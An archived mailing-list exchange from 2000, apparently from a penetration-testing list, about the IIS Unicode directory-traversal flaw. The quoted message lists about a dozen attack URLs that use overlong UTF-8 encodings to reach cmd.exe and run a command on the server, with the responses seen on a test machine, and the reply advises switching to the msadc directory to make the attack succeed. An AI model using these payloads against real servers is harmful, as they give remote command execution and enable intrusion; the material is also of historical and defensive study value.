Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: Re: [PEN-TEST] IIS UNICODE Strings

Re: [PEN-TEST] IIS UNICODE Strings

From: Marco <m.v.berkum_at_obit.nl>
Date: Tue, 31 Oct 2000 10:33:16 +0100

Erick Arturo Perez Huemer wrote:

> Testing this list on a Spanish NT 4.0 Sp6 machine reveals:
>
> http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found (HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+d
> ir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d
> ir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d
> ir+c:\
> page not found(HTTP 500 internal server error)
>
> http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/
> c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.ex
> e?/c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd
> .exe?/c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/
> cmd.exe?/c+dir+c:\
> you are not authorized to view this page. (HTTP 403 Forbidden)
>
> In our test, the InetPub directory is in logical drive D: instead of default
> C:.
> Does that matter in the above examples?
>
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Messenger - Talk while you surf! It's FREE.
> http://im.yahoo.com/

yes.... you should use msadc directory... its located on systemdrive.
chech my advisory at http://ws.obit.nl/nt.txt
grtz,
Marco
Received on Nov 01 2000

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos